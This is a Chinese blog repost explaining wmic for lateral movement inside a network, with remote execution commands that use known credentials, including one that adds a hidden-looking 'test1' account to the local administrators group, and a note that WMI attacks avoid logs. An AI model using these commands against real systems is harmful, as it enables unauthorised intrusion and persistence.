wmic 内网使用

最新推荐文章于 2022-11-28 15:41:49 发布
最新推荐文章于 2022-11-28 15:41:49 发布
阅读量504 收藏 3
点赞数
文章标签: 操作系统 运维
原文链接:http://www.cnblogs.com/0xdd/p/11393392.html
版权

先决条件:

1、远程服务器启动Windows Management Instrumentation服务,开放TCP135端口,防火墙放开对此端口的流量(默认放开);

2、远程服务器的本地安全策略的“网络访问: 本地帐户的共享和安全模式”应设为“经典-本地用户以自己的身份验证”

 

3、已知远程服务器或者主机的账号密码

wmic /node:”192.168.1.20″ /user:”domain\administrator” /password:”123456″

 

### wmic  
WMI 的全称是 Windows Management Instrumentation,它出现在所有的 Windows操作系统中,并由一组强大的工具集合组成,用于管理本地或远程的 Windows 系统,攻击者使用 wmi 来进行攻击,但 Windows 系统默认不会在日志中记录这些操作,可以做到无日志,攻击脚本无需写入到磁盘,增加了隐蔽性。推荐使用 wmic 进行远程执行命令。

常用命令
在远程系统上执行 bat 脚本

  1. wmic /node:192.168.17.138 /user:test /password:!@#123QWE process call create c:\programdata\test.bat

在远程系统上执行单条命令

  1. wmic /node:192.168.17.138 /user:test /password:!@#123QWE process call create "cmd.exe /c net user test1 !@#123QWE /add && net localgroup administrators test1 /add

工具说明
1、需要远程系统启动 Windows Management Instrumentation 服务,开放135端口
2、远程系统的本地安全策略的“网络访问: 本地帐户的共享和安全模式”应设为“经典-本地用户以自己的身份验证”
3、wmic 会以管理员权限在远程系统上执行命令
4、防火墙开启将无法连接
5、如果报错 “Invalid Global Switch” ,用双引号把包含-的结点括起来即可正常执行。

 

 

wmic设置密码永不过期

  1. wmic useraccount where name="administrator" set passwordexpires=false

转载于:https://www.cnblogs.com/0xdd/p/11393392.html

weixin_30826095
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
windows比cmd更强大的 WMIC命令使用详解
whl0071的专栏
10-14 5533
windows比cmd更强大的 WMIC命令使用详解
WMI(windows management instrumentation)利用思路简介
lanxia的博客
05-20 1529
wmi简述
用命令行连接到远程计算机
after_的专栏
06-17 6843
<br />    在公司配好了计算机,开开心心的把它上架了,打算回家VPN连到公司在作其他应用配置的时候,突然发现远程桌面忘记开了,郁闷啊!   <br /><br />  我们也许可以通过第三方软件来实现这个操作,这个不介绍了,下面介绍仅仅使用windows的一些命令来实现这个过程。仅供参考了。。   <br /><br />  一、我们可以直接通过在客户端输入wmic命令,来远程开启服务器的远程桌面,命令如下: <br /><br />  Wmic /node:"[full machine name]
WMIC使用
good good study
11-15 5659
远程创建进程 如下,以administrator用户连接192.168.52.140,并在机器上创建一个进程执行ipconfig命令,将结果写入c:\result.txt文本文件中:(由于wmic执行远程命令没有回显,所以要将结果写入到txt中) wmic /node:192.168.52.140 /user:administrator /password:123.com process call create "cmd.exe /c ipconfig > c:\result.txt...
内网渗透笔记
qq_32812063的博客
11-28 850
内网安全笔记
wmic命令行介绍及使用.pdf
09-07
在安全领域,尤其是渗透测试中,WMIC对于内网横向移动具有很高的实用性。 WMIC的出现简化了对WMI系统的管理,以前需要依赖专门的WMI应用程序、编程API或复杂的脚本语言,如C++或VBScript。WMIC提供了一个用户友好的...
Windows内网远程执行命令的几种方式.pdf
11-25
wmic /node:172.16.4.68 /user:sakura\sakura /password:admin123!@# process call create "cmd.exe /c ipconfig>c:\users\public\sakura.txt" ``` 该命令会在远程计算机上执行`ipconfig`命令,并将输出重定向到...
AHZY-内网安全攻防2020-01-12 内网安全攻防知识分享,
08-20
5. **网络主机探测**:探测内网中活跃的主机通常有两种方法:一是使用NetBIOS协议的工具,如`nbtscan`,快速扫描特定IP范围内的主机;二是通过`ping`命令结合循环,虽然较慢,但也能识别活动主机。 6. **端口扫描和...
内网信息收集.pdf
最新发布
04-08
- 在Windows Server 2008及以上版本,可以使用`wmic path win32_terminalservicesetting`等相关命令来管理远程桌面设置。 #### 四、自动化信息收集 为了提高效率,可以编写批处理脚本来自动化执行上述信息收集过程...
Windows 10/11【家庭版】设置本地账户密码永不过期的方法
rainforest_c的博客
02-08 1万+
Windows 10/11【家庭版】设置本地账户密码永不过期的方法 wmic useraccount where "Name='你要设置的账户名'" set PasswordExpires=false
设置密码永不过期
weixin_45145710的博客
03-11 642
wmic useraccount where name="Administrator" set PasswordExpires=FALSE
比CMD更强大的命令行:WMIC后渗透利用(系统命令)
热门推荐
discover2210212455的博客
09-15 5万+
写在前面的话 在这篇文章中,我们将讨论如何在攻击的后渗透利用阶段使用WMICWindows Management InstrumentationCommand Line)。当攻击者在远程PC上拿到meterpreter会话之后,他们就可以枚举大量的系统信息,并利用WMI命令行工具来进行更深程度的操作。 首先,我们会介绍如何拿到远程PC的meterpreter会话。拿到会话之后,我们还会告诉大...
Windows系统命令行NET LOCALGROUP命令 新增 删除更新 用户组
weixin_33810302的博客
03-23 4176
此命令的语法是: -NET LOCALGROUP [groupname [/COMMENT:"text"]] [/DOMAIN] groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN] groupname name [...] {/ADD | /DELETE} [/DOMAIN] 用法举例: 1.新增用户组一,描述为“用户组一描述更新”NET...
windows下强大的wmic命令行工具
打伞的蜗牛的博客
08-21 1万+
windows除了cmd ,powershell以外另一个更为强大的命令执行shell: windows最令网管诟病的地方就是命令行没有unix和linux强大。但这种情况正在不断改观,windows命令行也越来越强大了。其中,微软耗费大量精力打造的wmi就是一例。 获得进程ID与进程名称 www.baidu.com 代码: wmic process get processid,name ...
如何设置Win11账户密码有效期?Win11账户密码使用期限设置教程
qq_29508575的博客
04-21 4256
如何设置Win11账户密码有效期?当我们定期更换账户密码,可以有效的保护电脑的数据安全,当然了新的账户密码要记好哦。今天小编将为大家带来Win11账户密码使用期限设置教程,有需要的朋友们一起来看看是如何操作的吧。 更多系统教程尽在小白系统重装官网 ​   一、本地组策略编辑器   1、首先,按键盘上的 Win + S 组合键,或点击任务栏上的Windows 搜索图标;   2、Windows 搜索窗口,顶部搜索框,输入本地组策略编辑器,然后点击打开系统给出的最佳匹配编辑组策略控制面板;
Windows命令提示符下创建用户,并设置密码永不过期
weixin_34390105的博客
04-23 2009
set New-UserName=zh_cxl 设置要创建的用户名。 net user %New-UserName% zh_cxl!@123 /add &gt;nul 新建用户。 net localgroup Administrators %New-UserName% /add &gt;nul 把新建的用户加入管理员组。 ...
内网渗透中wmic使用
01-17 5128
简介 Windows Management Instrumentation (WMI) 是在基于 Windows操作系统上管理数据和操作的基础结构。您可以编写 WMI 脚本或应用程序来自动执行远程计算机上的管理任务,而且WMI 还向操作系统和产品的其他部分提供管理数据,例如 System Center Operations Manager(以前称为 Microsoft Operations Manager (MOM))或 Windows远程管理 ( WinRM )。–微软官方文档 WMI可以描述为一
关于内网常见端口漏洞和windowswmic
rlenew的博客
04-25 1423
WMIC是扩展WMI(Windows Management InstrumentationWindows管理规范),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,比如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之类的脚本语言,或者不掌握WMI名称空间的基本知识,要使用WMI管理系统是很困难的。WMIC改变了这种情况,为WMI名称空间提供了一个强.
python wmic_使用Python获取Windows电池容量
06-12
可以使用Python的`subprocess`模块和Windows的`wmic`命令来获取电池容量。下面是示例代码: ```python import subprocess # 执行wmic命令获取电池容量 output = subprocess.check_output('wmic path Win32_Battery get EstimatedChargeRemaining', shell=True) # 解析输出结果,获取电池容量 capacity = int(output.decode().split()[1]) print(f"电池容量:{capacity}%") ``` 注意,需要在Windows系统下运行该代码才能获取电池容量。同时,由于`wmic`命令可能会有延迟,因此在获取电池容量时可能会有一定的误差。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值